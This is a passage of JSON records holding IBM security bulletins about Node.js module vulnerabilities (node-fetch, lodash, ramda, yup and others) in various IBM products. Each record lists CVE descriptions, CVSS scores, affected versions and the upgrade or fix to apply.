V20.0.0.2 \nV19.0.0.1 - V19.0.0.3 \nV18.0.0.0 - V18.0.0.1| affected \nIBM Business Automation Workflow containers| V21.0.1 - V21.0.3 \nV20.0.0.1 - V20.0.0.2| affected \nIBM Business Process Manager| V8.6.0.0 - V8.6.0.201803| affected \nIBM Business Process Manager| V8.5.0.0 - V8.5.0.201706| not affected \n \n \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR [JR64327](<https://www.ibm.com/support/docview.wss?uid=swg1JR64327> \"JR64327\" ) as soon as practical. Note that the fix for 21.0.3 was published as a different APAR ID: [JR64661](<https://www.ibm.com/support/docview.wss?uid=swg1JR64661> \"JR64661\" ). \n\nAffected Product(s)| Version(s)| Remediation / Fix \n---|---|--- \nIBM Business Automation Workflow traditional| V21.0.3| Apply [JR64661](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=21.0.3&platform=All&function=aparId&apars=JR64661> \"JR64661\" ) \nIBM Business Automation Workflow containers| V21.0.3| Apply IBM Business Automation Workflow containers [21.0.3-IF007](<https://www.ibm.com/support/pages/node/6574109> \"21.0.3-IF007\" ) or later. \nIBM Business Automation Workflow traditional| V21.0.2| Apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=21.0.2&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Automation Workflow containers| V21.0.2| Apply IBM Business Automation Workflow containers [21.0.2-IF009](<https://www.ibm.com/support/pages/node/6574031> \"21.0.2-IF009\" ) or later or upgrade to IBM Business Automation Workflow containers [21.0.3-IF007](<https://www.ibm.com/support/pages/node/6574109> \"21.0.3-IF007\" ) or later \nIBM Business Automation Workflow traditional| V20.0.0.2| Apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=20.0.0.2&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Automation Workflow traditional| V20.0.0.1| Upgrade to [IBM Business Automation Workflow v20.0.0.2](<https://www.ibm.com/support/pages/node/713319#fp20002>) and apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=20.0.0.2&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Automation Workflow containers| V20.0.0.1 \nV20.0.0.2| Upgrade to IBM Business Automation Workflow containers [21.0.3-IF007](<https://www.ibm.com/support/pages/node/6574109> \"21.0.3-IF007\" ) or later \nIBM Business Automation Workflow traditional| V19.0.0.3| Apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=19.0.0.3&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Automation Workflow traditional| V19.0.0.2 \nV19.0.0.1 \nV18.0.0.2 \nV18.0.0.1| Upgrade to [IBM Business Automation Workflow 19.0.0.3](<http://www.ibm.com/support/pages/node/1107021>) and apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=19.0.0.3&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Automation Workflow traditional| V18.0.0.0| Apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=18.0.0.0&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \nIBM Business Process Manager| V8.6.0.0 - V8.6.0.201803| Upgrade to [IBM Business Process Manager Version 8.6 Cumulative Fix 2018.03](<https://www.ibm.com/support/pages/node/316403>) and apply [JR64327](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=18.0.0.0&platform=All&function=aparId&apars=JR64327> \"JR64327\" ) or upgrade to [IBM Business Automation Workflow 21.0.3](<https://www.ibm.com/support/pages/node/6507343>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-28T17:02:02", "type": "ibm", "title": "Security Bulletin: Information disclosure vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2022-0155, CVE-2022-0536, CVE-2021-3749", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3749", "CVE-2022-0155", "CVE-2022-0536"], "modified": "2022-04-28T17:02:02", "id": "E23F7B0954D8804CF73BA94A1EC50BB525067CF5C982BEE6402F9DE045B28EF2", "href": "https://www.ibm.com/support/pages/node/6574845", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-28T01:44:55", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains vulnerable versions of Node.js modules used in Web clients.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42581](<https://vulners.com/cve/CVE-2021-42581>) \n** DESCRIPTION: **Ramda could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in the mapObjIndexed function. By supplying a specially-crafted object using the __proto__ argument, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226072](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226072>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** IBM X-Force ID: **221916 \n** DESCRIPTION: **Node.js yup module, could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in the .SetLocale function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/221916 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221916>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.9 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.5.0 \n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-29T02:19:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Node.js", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42581"], "modified": "2022-06-29T02:19:28", "id": "4D4AB5316A6B8B864EF20AC92A165303484F0EF5EAF13A61CD628D9334E9AB46", "href": "https://www.ibm.com/support/pages/node/6598699", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-28T01:46:11", "description": "## Summary\n\nNode.js as used by IBM Security QRadar Analyst Workflow App for IBM QRadar SIEM is vulnerable to multiple vulnerabilities. IBM Security QRadar Analyst Workflow App for IBM QRadar SIEM has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28469](<https://vulners.com/cve/CVE-2020-28469>) \n** DESCRIPTION: **Node.js glob-parent module is vulnerable to a denial of service. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a regular expression denial of service. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196451>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-33502](<https://vulners.com/cve/CVE-2021-33502>) \n** DESCRIPTION: **Node.js normalize-url module is vulnerable to a denial of service, caused by a ReDoS (regular expression denial of service) flaw in the data URLs. By using a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202299](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202299>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-29060](<https://vulners.com/cve/CVE-2021-29060>) \n** DESCRIPTION: **Node.js Color-String module is vulnerable to a denial of service, caused by an error when the application is provided and checks a crafted invalid HWB string. By sending a specially crafted string, a remote attacker could exploit this vulnerability to cause a regular expression denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/204156](<https://exchange.xforce.ibmcloud.com/vulnerabilities/204156>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-28498](<https://vulners.com/cve/CVE-2020-28498>) \n** DESCRIPTION: **Node.js Elliptic module could allow a local attacker to obtain sensitive information, caused by a flaw in the secp256k1 implementation in elliptic/ec/key.js. By sending a specially-crafted request using a number of ECDH operations, an attacker could exploit this vulnerability to obtain the private key information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 6.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196053](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196053>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-7793](<https://vulners.com/cve/CVE-2020-7793>) \n** DESCRIPTION: **ua-parser-js is vulnerable to a denial of service, caused by regular expression denial of service (ReDoS) in multiple regexes. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192997](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192997>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-27292](<https://vulners.com/cve/CVE-2021-27292>) \n** DESCRIPTION: **UAParser.js is vulnerable to a denial of service. By sending a specially crafted User-Agent header, a remote attacker could exploit this vulnerability to cause the application to process the file for an extended time. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198307](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198307>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security QRadar Analyst Workflow| 1.0 - 2.15.0 \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n[Update to 2.15.1](<https://exchange.xforce.ibmcloud.com/hub/extension/123f9ec5a53214cc6e35b1e4700b0806?_ga=2.163702847.1423671275.1652709057-1863979888.1651847998> \"Update to 2.15.1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-24T18:34:36", "type": "ibm", "title": "Security Bulletin: Node.js as used by IBM Security QRadar Analyst Workflow App for IBM QRadar SIEM is vulnerable to multiple vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168", "CVE-2020-28469", "CVE-2020-28498", "CVE-2020-28500", "CVE-2020-7793", "CVE-2021-23337", "CVE-2021-27292", "CVE-2021-29060", "CVE-2021-33502"], "modified": "2022-05-24T18:34:36", "id": "E90F2758EB55FDBC299EC4F9D774418DBCCC47DB3CE55D154EB978135CCA6896", "href": "https://www.ibm.com/support/pages/node/6589581", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:39", "description": "## Summary\n\nIBM Cloud Transformation Advisor has addressed Node.js vulnerability CVE-2020-15168\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.4.0, 2.4.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.4.2 or later. \n\nIBM Cloud Transformation Advisor can be installed from OperatorHub page in Red Hat OpenShift Container Platform or locally following this [link](<https://www.ibm.com/cloud/architecture/tutorials/install-ibm-transformation-advisor-local> \"link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-03-30T19:24:48", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by Node.js vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2021-03-30T19:24:48", "id": "0AD1ABD3A4EE94669ABFEF468671D6A66B8F413908447E8D0315800041BEDF41", "href": "https://www.ibm.com/support/pages/node/6438031", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T21:48:42", "description": "## Summary\n\nA security vulnerability in Node.js node-fetch module affects IBM Cloud Automation Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Automation Manager| 4.2.0.1 \n \n\n\n## Remediation/Fixes\n\nDownload IBM Cloud Automation Manager 4.2.0.1 ifix 1 from [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build565648&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build565648&includeSupersedes=0>)\n\nFollow the instructions in Readme link in [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build565648&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build565648&includeSupersedes=0>) to install the ifix 1 to your IBM Cloud Automation Manager 4.2.0.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-11-26T21:48:06", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Automation Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-11-26T21:48:06", "id": "E9E1A81B83D89662A4701E3073B58E59FD1FC0DD93A3454D407830444DA1A6F5", "href": "https://www.ibm.com/support/pages/node/6373026", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T21:48:10", "description": "## Summary\n\nSecurity Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Pak for Multicloud Management Managed Service.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management| 2.0 \n \n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.1 by following the instructions in <https://www.ibm.com/support/knowledgecenter/en/SSFC4F_2.1.0/install/upgrade.html>.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-12-14T18:35:49", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-12-14T18:35:49", "id": "DADA1FE16809A5FC90650AF1F43162F58CAA00EC2A73D51B4ACDCCCDC28F33A7", "href": "https://www.ibm.com/support/pages/node/6350659", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T21:47:41", "description": "## Summary\n\nIBM App Connect Enterprise ship with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM App connect Enterprise V11 , V11.0.0.0 - V11.0.0.10\n\n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise| V11.0.0.0-V11.0.0.10| IT35155| \n\nThe APAR is available in fix pack 11.0.0.11\n\n[11.0.0.11](<https://www.ibm.com/support/pages/ibm-app-connect-enterprise-v110-fix-pack-110011> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-01-05T12:36:25", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise (CVE-2020-15168)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2021-01-05T12:36:25", "id": "AF584771147487ACBB5230FB00DA473BDA6B02F820E8C00B06BB04A7FACEE913", "href": "https://www.ibm.com/support/pages/node/6397690", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T21:48:52", "description": "## Summary\n\nApp Connect Enterprise Certified Container is vulnerable to CVE-2020-15168, which may lead to a denial of service\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. 